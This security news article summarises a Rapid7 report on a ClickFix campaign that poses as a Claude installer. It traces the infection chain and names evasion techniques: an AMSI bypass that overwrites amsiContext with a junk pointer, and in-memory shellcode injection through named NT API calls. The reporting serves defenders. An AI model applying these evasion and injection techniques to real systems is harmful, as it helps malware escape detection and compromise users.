Ddos 
According to a new technical analysis from Rapid7, a sophisticated ClickFix campaign has been discovered masquerading as an installer for Claude, the popular AI assistant that has recently surged in public attention.
The campaign targets users in both the EU and the US, leveraging the hype surrounding AI tools to bypass traditional skepticism. As the report notes, “phishing campaigns utilizing various ClickFix techniques have been a commonly used method of social engineering… One of the main reasons for this is simply because they work”.
The attack chain begins with a deceptive URL—download-version[.]1-5-8[.]com/claude.msixbundle—which impersonates a legitimate Windows app package. MSIX files are standard formats typically found in the Microsoft Store, making them an effective lure for unsuspecting users.
Rapid7 SOC analysts were alerted when they observed the Windows mshta.exe utility executing a suspicious command. “MSIX files are… definitely not something you would see being passed as an argument to mshta,” the report explains. This unusual behavior triggered a detection rule identifying remote payload execution via the Windows Run utility, which tracks the RunMRU registry key.
A closer look at the “Claude” payload revealed a complex, multi-stage infection process:
- The ZIP Wrapper: While the file mimicked an MSIX bundle, it was actually a ZIP archive containing a string reference to a Microsoft Bing package to bolster its legitimacy.
- Embedded HTA: Inside the archive sat an HTML Application (HTA) containing heavily obfuscated VBScript.
- PowerShell Staging: The VBScript’s primary role was to decode and execute a staging PowerShell command.
This staging payload is remarkably targeted. It generates an MD5 hash based on the victim’s specific computer name and username to craft a unique URL for the next stage of the attack.
To evade modern endpoint defenses, the attackers implemented a surgical AMSI (Antimalware Scan Interface) bypass. By using a custom deobfuscation routine, the script overwrites the amsiContext field within the .NET AmsiUtils library with a junk pointer (0x41414141), effectively blinding the system’s real-time scanning capabilities.
With the coast clear, the malware executes a ScriptBlock that performs a process injection routine. It gains handles for several critical Windows API calls—including NtAllocateVirtualMemory, NtProtectVirtualMemory, and NtCreateThreadEx—to inject and run encrypted shellcode directly in memory.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
